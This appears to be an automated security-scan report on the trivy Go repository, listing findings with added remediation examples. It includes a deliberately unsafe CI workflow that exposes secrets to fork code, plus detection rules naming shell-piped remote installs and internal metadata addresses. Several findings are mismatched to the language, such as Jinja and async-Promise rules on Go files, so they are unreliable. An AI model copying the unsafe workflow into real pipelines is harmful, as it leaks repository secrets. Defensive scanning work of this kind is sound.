https://github.com/aquasecurity/trivy ·
lang: go ·
LOC: ·
source: user_submitted
| Rule | Title | Severity | Count |
|---|---|---|---|
| MINED108 | self.attribute used but never assigned in __init__ | high | 25 |
| AIC003 | Duplicated implementation block across source files | low | 19 |
| DKR001 | Docker final stage has no non-root USER | medium | 11 |
| MINED134 | Binary file committed in source repo | high | 9 |
| MINED118 | Dockerfile FROM not pinned by sha256 digest | high | 7 |
| DKR002 | Dockerfile base image has no explicit tag | medium | 5 |
| ERR003 | Ignored Error (Go): Ignoring error return values. | medium | 4 |
| MINED124 | requirements.txt entry has no version pin | medium | 4 |
| AUC009 | Sensitive function route lacks elevated authorization evidence | medium | 4 |
| MINED060 | Go Context No Cancel | info | 4 |
MINED019
Ssti Jinja From String
CWE-94
pkg/iac/scanners/ansible/parser/template.go:58
· conf 1.00
[MINED019] Ssti Jinja From String: jinja2.Environment().from_string(user_input) — full RCE via templates.
MINED116
GHA pull_request workflow leaks secrets to forks
CWE-829
.github/workflows/publish-chart.yaml:70
· conf 0.90
[MINED116] Workflow uses `secrets.ACTIONS_MULTI_WRITE_GH_APP_CLIENT_ID` on a `pull_request` trigger: This workflow triggers on `pull_request`, which checks out the FORK's code. Referencing `${ secret…
MINED116
GHA pull_request workflow leaks secrets to forks
CWE-829
.github/workflows/publish-chart.yaml:71
· conf 0.90
[MINED116] Workflow uses `secrets.TRIVY_WORKFLOW_TRIGGER_APP_PRIVATE_KEY` on a `pull_request` trigger: This workflow triggers on `pull_request`, which checks out the FORK's code. Referencing `${ secr…
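A worked configuration for the two MINED116 findings, added here as an example and not taken from the trivy repository (the job names, the `make` targets and the `APP_PRIVATE_KEY` secret name are placeholders). One caveat from GitHub's own behaviour: a workflow triggered by `pull_request` from a fork does not receive repository secrets at all (only a `GITHUB_TOKEN` with at most read access), so the secret reference expands to an empty string rather than leaking. The shape that does hand secrets to fork-controlled code is `pull_request_target`, which runs in the base repository's context with secrets, combined with checking out the PR head and executing anything from it. The first document below is that unsafe shape; the second keeps untrusted code and secrets on different triggers.

```yaml
# UNSAFE: pull_request_target runs with the base repository's secrets, and checking
# out the PR head then running its build hands those secrets to the fork's code.
name: build-unsafe
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # fork-controlled tree
      - run: make build                                     # fork-controlled Makefile
        env:
          APP_KEY: ${{ secrets.APP_PRIVATE_KEY }}            # readable by that Makefile
---
# SAFER: untrusted PR code runs under plain pull_request, where no repository secret
# reaches the runner; the secret-bearing job runs only on pushes to a trusted branch
# and never checks out fork code.
name: build-safe
on:
  pull_request:
  push:
    branches: [main]
permissions:
  contents: read
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: make lint
  publish:
    if: github.event_name == 'push'
    needs: lint
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: make publish
        env:
          APP_KEY: ${{ secrets.APP_PRIVATE_KEY }}
```

The `actions/checkout@v4` reference is a mutable tag; pinning third-party actions to a full commit SHA is the same discipline MINED118 asks for on Dockerfile base images.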
MINED004
Weak Crypto
CWE-327
pkg/dependency/parser/java/jar/sonatype/sonatype.go:109
· conf 1.00
[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums).
MINED004
Weak Crypto
CWE-327
pkg/digest/digest.go:4
· conf 1.00
[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums).
MINED004
Weak Crypto
CWE-327
pkg/fanal/analyzer/pkg/apk/apk.go:227
· conf 1.00
[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums).
MINED016
Go Error Ignored
CWE-754
internal/gittest/server.go:67
· conf 1.00
[MINED016] Go Error Ignored: _, err := fn() with err not checked. Go anti-pattern.
MINED016
Go Error Ignored
CWE-754
internal/testutil/fs.go:18
· conf 1.00
[MINED016] Go Error Ignored: _, err := fn() with err not checked. Go anti-pattern.
MINED016
Go Error Ignored
CWE-754
internal/testutil/gzip.go:32
· conf 1.00
[MINED016] Go Error Ignored: _, err := fn() with err not checked. Go anti-pattern.
MINED033
Go Recover Without Log
CWE-755
pkg/iac/scanners/ansible/parser/template.go:71
· conf 1.00
[MINED033] Go Recover Without Log: defer func() { recover() }() that silently swallows panic.
MINED033
Go Recover Without Log
CWE-755
pkg/iac/scanners/cloudformation/parser/parser.go:88
· conf 1.00
[MINED033] Go Recover Without Log: defer func() { recover() }() that silently swallows panic.
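The MINED016 and MINED033 findings above describe the two halves of the same problem: an error that is dropped, and a panic that is recovered without any trace. The following is an added example, not code from the trivy repository; `parseFieldsRaw` is a constructed stand-in for any parser that can panic on malformed input. It shows the one detail that makes a recovering defer useful at all in Go: the results must be named, because the deferred function can only change what the caller receives by assigning to them.

```go
package main

import (
	"errors"
	"fmt"
	"log"
	"runtime/debug"
	"strconv"
	"strings"
)

// ErrParserPanic marks errors that came from a recovered panic, so callers can tell
// "malformed input" from "bug in the parser" when deciding whether to retry or abort.
var ErrParserPanic = errors.New("parser panicked")

// parseFieldsRaw is a constructed stand-in for a parser that panics on malformed input
// (here: index out of range on a one-field line). It is not trivy's parser.
func parseFieldsRaw(line string) (name string, size int, err error) {
	parts := strings.Split(line, " ")
	size, err = strconv.Atoi(parts[1]) // panics when the line has no second field
	return parts[0], size, err
}

// ParseLine turns a panic into a returned error AND logs it with a stack trace.
// The results are named because a deferred function can only change what the caller
// sees by assigning to named results; the panic is logged because a bare
// `defer func() { recover() }()` would erase every trace of the bug.
func ParseLine(line string) (name string, size int, err error) {
	defer func() {
		if r := recover(); r != nil {
			log.Printf("recovered while parsing %q: %v\n%s", line, r, debug.Stack())
			name, size = "", 0
			err = fmt.Errorf("%w: %v", ErrParserPanic, r)
		}
	}()
	return parseFieldsRaw(line)
}

// ParseAll checks every error instead of discarding it with `_`: a bad line becomes a
// reported problem rather than a silently zero-valued record.
func ParseAll(lines []string) (names []string, problems []error) {
	for _, l := range lines {
		name, _, err := ParseLine(l)
		if err != nil {
			problems = append(problems, fmt.Errorf("line %q: %w", l, err))
			continue
		}
		names = append(names, name)
	}
	return names, problems
}

func main() {
	// Constructed input: one good line, one that panics the raw parser, one with a bad number.
	names, problems := ParseAll([]string{"busybox 1024", "broken", "musl x"})
	fmt.Println("parsed:", names)
	for _, p := range problems {
		fmt.Println("error:", p, "| from panic:", errors.Is(p, ErrParserPanic))
	}
}
```

Callers can then treat `ErrParserPanic` differently from an ordinary parse error (alert on it, never retry it), which is impossible once the panic has been swallowed.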
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:116
· conf 1.00
[MINED108] `self.requires` used but never assigned in __init__: Method `requirements` of class `OpenSSLConan` reads `self.requires`, but no assignment to it exists in __init__ (and no class-level fal…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:119
· conf 1.00
[MINED108] `self._settings_build` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self._settings_build`, but no assignment to it exists in __init__ (an…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:121
· conf 1.00
[MINED108] `self.tool_requires` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.tool_requires`, but no assignment to it exists in __init__ (and no…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:122
· conf 1.00
[MINED108] `self._use_nmake` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self._use_nmake`, but no assignment to it exists in __init__ (and no class…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:123
· conf 1.00
[MINED108] `self.tool_requires` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.tool_requires`, but no assignment to it exists in __init__ (and no…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:125
· conf 1.00
[MINED108] `self.win_bash` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.win_bash`, but no assignment to it exists in __init__ (and no class-lev…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:126
· conf 1.00
[MINED108] `self.conf` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.conf`, but no assignment to it exists in __init__ (and no class-level fallb…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:127
· conf 1.00
[MINED108] `self.tool_requires` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.tool_requires`, but no assignment to it exists in __init__ (and no…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:150
· conf 1.00
[MINED108] `self._is_clangcl` used but never assigned in __init__: Method `_use_nmake` of class `OpenSSLConan` reads `self._is_clangcl`, but no assignment to it exists in __init__ (and no class-level…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:153
· conf 1.00
[MINED108] `self.conan_data` used but never assigned in __init__: Method `source` of class `OpenSSLConan` reads `self.conan_data`, but no assignment to it exists in __init__ (and no class-level fallb…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:153
· conf 1.00
[MINED108] `self.version` used but never assigned in __init__: Method `source` of class `OpenSSLConan` reads `self.version`, but no assignment to it exists in __init__ (and no class-level fallback). …
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:154
· conf 1.00
[MINED108] `self.source_folder` used but never assigned in __init__: Method `source` of class `OpenSSLConan` reads `self.source_folder`, but no assignment to it exists in __init__ (and no class-level…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:159
· conf 1.00
[MINED108] `self._use_nmake` used but never assigned in __init__: Method `_target` of class `OpenSSLConan` reads `self._use_nmake`, but no assignment to it exists in __init__ (and no class-level fall…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:161
· conf 1.00
[MINED108] `self._is_mingw` used but never assigned in __init__: Method `_target` of class `OpenSSLConan` reads `self._is_mingw`, but no assignment to it exists in __init__ (and no class-level fallba…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:327
· conf 1.00
[MINED108] `self._targets` used but never assigned in __init__: Method `_ancestor_target` of class `OpenSSLConan` reads `self._targets`, but no assignment to it exists in __init__ (and no class-level…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:339
· conf 1.00
[MINED108] `self.package_folder` used but never assigned in __init__: Method `_get_default_openssl_dir` of class `OpenSSLConan` reads `self.package_folder`, but no assignment to it exists in __init__…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:343
· conf 1.00
[MINED108] `self._get_default_openssl_dir` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self._get_default_openssl_dir`, but no assignment to it exists …
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:344
· conf 1.00
[MINED108] `self.win_bash` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self.win_bash`, but no assignment to it exists in __init__ (and no class-level …
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:346
· conf 1.00
[MINED108] `self._target` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self._target`, but no assignment to it exists in __init__ (and no class-level fa…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:353
· conf 1.00
[MINED108] `self._perl` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self._perl`, but no assignment to it exists in __init__ (and no class-level fallba…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:377
· conf 1.00
[MINED108] `self.dependencies` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self.dependencies`, but no assignment to it exists in __init__ (and no clas…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:384
· conf 1.00
[MINED108] `self._settings_build` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self._settings_build`, but no assignment to it exists in __init__ (and n…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:389
· conf 1.00
[MINED108] `self.dependencies` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self.dependencies`, but no assignment to it exists in __init__ (and no clas…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:401
· conf 1.00
[MINED108] `self.output` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self.output`, but no assignment to it exists in __init__ (and no class-level fall…
MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:408
· conf 1.00
[MINED108] `self._perl` used but never assigned in __init__: Method `generate` of class `OpenSSLConan` reads `self._perl`, but no assignment to it exists in __init__ (and no class-level fallback). Th…
MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `alpine:3.23.4` not pinned by digest: `FROM alpine:3.23.4` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is po…
MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
Dockerfile.canary:1
· conf 0.90
[MINED118] Dockerfile FROM `alpine:3.23.4` not pinned by digest: `FROM alpine:3.23.4` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is po…
MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
integration/testdata/fixtures/repo/custom-policy/Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `alpine:3.13` not pinned by digest: `FROM alpine:3.13` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is potent…
MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
integration/testdata/fixtures/repo/dockerfile/Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `alpine:3.13` not pinned by digest: `FROM alpine:3.13` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is potent…
MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
pkg/dependency/parser/java/jar/testdata/testimage/gradle/Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `gradle:6.8.1-jdk` not pinned by digest: `FROM gradle:6.8.1-jdk` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build…
MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
pkg/dependency/parser/java/jar/testdata/testimage/maven/Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `maven:3.6.3-jdk-11` not pinned by digest: `FROM maven:3.6.3-jdk-11` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every b…
MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
pkg/fanal/analyzer/buildinfo/testdata/dockerfile/Dockerfile.sad:1
· conf 0.90
[MINED118] Dockerfile FROM `sha256:4224eead35ea350b4b9d4ac67550e92efb9a50d3855cb3381469fe4c7e3f2053` not pinned by digest: `FROM sha256:4224eead35ea350b4b9d4ac67550e92efb9a50d3855cb3381469fe4c7e3f205…
MINED128
go.mod replace directive points to local path or unrelated fork
CWE-829
pkg/dependency/parser/golang/mod/testdata/replaced-with-local-path-and-version/go.mod:11
· conf 0.90
[MINED128] go.mod replaces `golang.org/x/xerrors` — points to a LOCAL path: `replace golang.org/x/xerrors => ./xerrors` overrides the canonical dependency with a different source (points to a LOCAL p…
MINED128
go.mod replace directive points to local path or unrelated fork
CWE-829
pkg/dependency/parser/golang/mod/testdata/replaced-with-local-path-and-version-mismatch/go.mod:11
· conf 0.90
[MINED128] go.mod replaces `golang.org/x/xerrors` — points to a LOCAL path: `replace golang.org/x/xerrors => ./xerrors` overrides the canonical dependency with a different source (points to a LOCAL p…
MINED128
go.mod replace directive points to local path or unrelated fork
CWE-829
pkg/dependency/parser/golang/mod/testdata/replaced-with-local-path/go.mod:11
· conf 0.90
[MINED128] go.mod replaces `golang.org/x/xerrors` — points to a LOCAL path: `replace golang.org/x/xerrors => ./xerrors` overrides the canonical dependency with a different source (points to a LOCAL p…
MINED134
Binary file committed in source repo
pkg/dependency/parser/golang/binary/testdata/test.exe:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/golang/binary/testdata/test.exe` committed in source repo: `pkg/dependency/parser/golang/binary/testdata/test.exe` is a .exe binary (2,708,480 bytes) com…
MINED134
Binary file committed in source repo
pkg/dependency/parser/java/jar/testdata/hadoop-shaded-guava-1.1.0-SNAPSHOT.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/hadoop-shaded-guava-1.1.0-SNAPSHOT.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/hadoop-shaded-guava-1.1.0-SN…
MINED134
Binary file committed in source repo
pkg/dependency/parser/java/jar/testdata/heuristic-1.0.0-SNAPSHOT.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/heuristic-1.0.0-SNAPSHOT.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/heuristic-1.0.0-SNAPSHOT.jar` is a .ja…
MINED134
Binary file committed in source repo
pkg/dependency/parser/java/jar/testdata/io.quarkus.gizmo.gizmo-1.1.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/io.quarkus.gizmo.gizmo-1.1.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/io.quarkus.gizmo.gizmo-1.1.jar` is a…
MINED134
Binary file committed in source repo
pkg/dependency/parser/java/jar/testdata/nested.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/nested.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/nested.jar` is a .jar binary (1,483 bytes) committed to …
MINED134
Binary file committed in source repo
pkg/dependency/parser/java/jar/testdata/test.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/test.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/test.jar` is a .jar binary (1,105 bytes) committed to a re…
MINED134
Binary file committed in source repo
pkg/dependency/parser/rust/binary/testdata/test.exe:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/rust/binary/testdata/test.exe` committed in source repo: `pkg/dependency/parser/rust/binary/testdata/test.exe` is a .exe binary (1,394,632 bytes) committ…
MINED134
Binary file committed in source repo
pkg/fanal/analyzer/language/java/jar/testdata/test.jar:1
· conf 0.90
[MINED134] Binary file `pkg/fanal/analyzer/language/java/jar/testdata/test.jar` committed in source repo: `pkg/fanal/analyzer/language/java/jar/testdata/test.jar` is a .jar binary (277,275 bytes) com…
MINED134
Binary file committed in source repo
pkg/fanal/analyzer/testdata/post-apps/jar/jackson-annotations-2.15.0-rc2.jar:1
· conf 0.90
[MINED134] Binary file `pkg/fanal/analyzer/testdata/post-apps/jar/jackson-annotations-2.15.0-rc2.jar` committed in source repo: `pkg/fanal/analyzer/testdata/post-apps/jar/jackson-annotations-2.15.0-r…
SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
pkg/cache/redis.go:92
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…
SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
pkg/commands/run.go:25
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…
SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
pkg/dependency/parser/golang/mod/parse.go:47
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…
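The SEC029 findings above name the mitigation (allowlist validation) but not the two places it has to happen. The block below is an added example, not code from the trivy repository: `ValidateOutboundURL` checks scheme, userinfo, allowlist and every resolved address before a request is built, and `SafeDialer` repeats the address check at connect time so a DNS answer that changes between validation and dial (rebinding) is still caught. The allowlist and the DNS table are constructed for the demo; the `Resolver` type is an assumption so the check runs offline.

```go
package main

import (
	"fmt"
	"net"
	"net/netip"
	"net/url"
	"syscall"
	"time"
)

// Resolver abstracts DNS so the check runs offline; production code wraps net.DefaultResolver.LookupNetIP.
type Resolver func(host string) ([]netip.Addr, error)

// Blocked beyond what netip.Addr's IsPrivate/IsLoopback/IsLinkLocal* already classify.
var extraBlocked = []netip.Prefix{
	netip.MustParsePrefix("0.0.0.0/8"),
	netip.MustParsePrefix("100.64.0.0/10"), // CGNAT; some cloud metadata endpoints live here
}

// IsPrivate reports whether an address must never be dialed on a user's behalf.
func IsPrivate(a netip.Addr) bool {
	a = a.Unmap() // ::ffff:10.0.0.1 must be judged as 10.0.0.1
	if a.IsLoopback() || a.IsPrivate() || a.IsLinkLocalUnicast() || a.IsLinkLocalMulticast() ||
		a.IsUnspecified() || a.IsMulticast() {
		return true
	}
	for _, p := range extraBlocked {
		if p.Contains(a) {
			return true
		}
	}
	return false
}

// ValidateOutboundURL accepts only plain https to an allowlisted host whose every address
// (literal or resolved) is public. One private address among several is enough to reject.
func ValidateOutboundURL(raw string, allowedHosts map[string]bool, resolve Resolver) (*url.URL, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	if u.Scheme != "https" || u.User != nil {
		return nil, fmt.Errorf("only plain https URLs are allowed, got %q", raw)
	}
	host := u.Hostname()
	if !allowedHosts[host] {
		return nil, fmt.Errorf("host %q not in allowlist", host)
	}
	var addrs []netip.Addr
	if a, err := netip.ParseAddr(host); err == nil {
		addrs = []netip.Addr{a}
	} else if addrs, err = resolve(host); err != nil {
		return nil, err
	}
	for _, a := range addrs {
		if IsPrivate(a) {
			return nil, fmt.Errorf("host %q resolves to blocked address %s", host, a)
		}
	}
	return u, nil
}

// SafeDialer re-checks the address at connect time, closing the DNS-rebinding window
// between validation and the actual dial; use it as the http.Transport's DialContext.
func SafeDialer() *net.Dialer {
	return &net.Dialer{
		Timeout: 10 * time.Second,
		Control: func(network, address string, _ syscall.RawConn) error {
			ap, err := netip.ParseAddrPort(address)
			if err != nil {
				return err
			}
			if IsPrivate(ap.Addr()) {
				return fmt.Errorf("dial to %s blocked", address)
			}
			return nil
		},
	}
}

// Constructed allowlist and DNS table for the demo; not real data.
var sampleAllowlist = map[string]bool{"api.example.com": true, "metadata.internal": true}

var sampleDNS = map[string][]netip.Addr{
	"api.example.com":   {netip.MustParseAddr("93.184.216.34")},
	"metadata.internal": {netip.MustParseAddr("93.184.216.34"), netip.MustParseAddr("169.254.169.254")},
}

var sampleResolver Resolver = func(host string) ([]netip.Addr, error) {
	if a, ok := sampleDNS[host]; ok {
		return a, nil
	}
	return nil, fmt.Errorf("no such host %q", host)
}

func main() {
	_, err := ValidateOutboundURL("https://metadata.internal/", sampleAllowlist, sampleResolver)
	fmt.Println(err)
}
```

Redirects need the same treatment: an `http.Client` following a 302 to `http://169.254.169.254/` bypasses the URL check, so either set `CheckRedirect` to re-validate each hop or rely on `SafeDialer` being the transport's dialer for every hop.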
SEC035
Unbounded Resource Allocation — DoS risk
pkg/fanal/analyzer/secret/secret.go:98
· conf 1.00
[SEC035] Unbounded Resource Allocation — DoS risk: Allocating resources (buffers, recursion stack, large ranges) based on user input without an upper bound. Attackers send `size=10000000` to exhaust …
SEC069
Dockerfile: no USER directive (runs as root)
pkg/fanal/analyzer/buildinfo/dockerfile.go:1
· conf 1.00
[SEC069] Dockerfile: no USER directive (runs as root): Container runs as root because no USER directive was set. Ported from trivy DS002 / checkov CKV_DOCKER_3 (Apache-2.0). Implement as a file-level…
SEC069
Dockerfile: no USER directive (runs as root)
pkg/fanal/analyzer/config/dockerfile/docker.go:1
· conf 1.00
[SEC069] Dockerfile: no USER directive (runs as root): Container runs as root because no USER directive was set. Ported from trivy DS002 / checkov CKV_DOCKER_3 (Apache-2.0). Implement as a file-level…
SEC069
Dockerfile: no USER directive (runs as root)
pkg/fanal/analyzer/imgconf/dockerfile/dockerfile.go:1
· conf 1.00
[SEC069] Dockerfile: no USER directive (runs as root): Container runs as root because no USER directive was set. Ported from trivy DS002 / checkov CKV_DOCKER_3 (Apache-2.0). Implement as a file-level…
SEC093
Go: exec.Command with non-literal
pkg/plugin/plugin.go:71
· conf 1.00
[SEC093] Go: exec.Command with non-literal: exec.Command(<var>) — variable command name allows command injection. Ported from gosec G204 (Apache-2.0).
SEC114
path.join / Path() on user-controlled segment without containment check
pkg/fanal/analyzer/language/java/pom/pom.go:27
· conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…
SEC114
path.join / Path() on user-controlled segment without containment check
pkg/fanal/analyzer/sbom/sbom.go:57
· conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…
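The SEC114 description says `filepath.Clean` and `path.Join` do not prevent escape; the reason is that `filepath.Join` already cleans its result, so `Join(base, "../../etc/passwd")` is a perfectly clean path that points outside `base`. The containment check has to be done on the joined result, and it has to compare path components rather than string prefixes (`/srv/data2` starts with `/srv/data` but is not inside it). The following is an added example, not code from the trivy repository; the `/srv/data` base and the inputs are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

var ErrPathEscape = errors.New("path escapes base directory")

// JoinInside joins untrusted segments under base and rejects any result that leaves base.
// This is a lexical check: if base itself contains symlinks, call filepath.EvalSymlinks on
// the result and re-check, or open through os.Root (Go 1.24+), which enforces this in the kernel.
func JoinInside(base string, untrusted ...string) (string, error) {
	base = filepath.Clean(base)
	for _, s := range untrusted {
		// filepath.Join keeps base even when a segment is absolute, but an absolute path
		// where a relative name is expected is a sign of tampering; reject it outright.
		if filepath.IsAbs(s) || filepath.VolumeName(s) != "" || strings.HasPrefix(s, "/") || strings.HasPrefix(s, `\`) {
			return "", fmt.Errorf("%w: absolute segment %q", ErrPathEscape, s)
		}
	}
	joined := filepath.Join(append([]string{base}, untrusted...)...)
	rel, err := filepath.Rel(base, joined)
	if err != nil {
		return "", err
	}
	// Rel yields ".." or "../x" exactly when joined lies outside base; a string-prefix
	// test on joined would wrongly accept "/srv/data2/x" for base "/srv/data".
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("%w: %q resolves to %q", ErrPathEscape, filepath.Join(untrusted...), joined)
	}
	return joined, nil
}

func main() {
	base := filepath.Join(string(filepath.Separator), "srv", "data")
	for _, in := range []string{"pom.xml", "sub/../pom.xml", "../../../etc/passwd", "../data2/x"} {
		p, err := JoinInside(base, in)
		fmt.Printf("%-22s -> %q %v\n", in, p, err)
	}
}
```

The returned path is safe to open only as long as the check and the open see the same filesystem state; for directories an attacker can write into (an extracted archive, a cloned repository), resolve symlinks or use `os.Root` before trusting it.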
SEC128
Async function without await — fire-and-forget Promise (AI mistake)
pkg/cache/memory.go:38
· conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…
SEC128
Async function without await — fire-and-forget Promise (AI mistake)
pkg/mapfs/file.go:99
· conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…
AGT015
Remote install command pipes network code directly to a shell
contrib/Trivy.gitlab-ci.yml:15
· conf 0.70
Remote install command pipes network code directly to a shell
AGT015
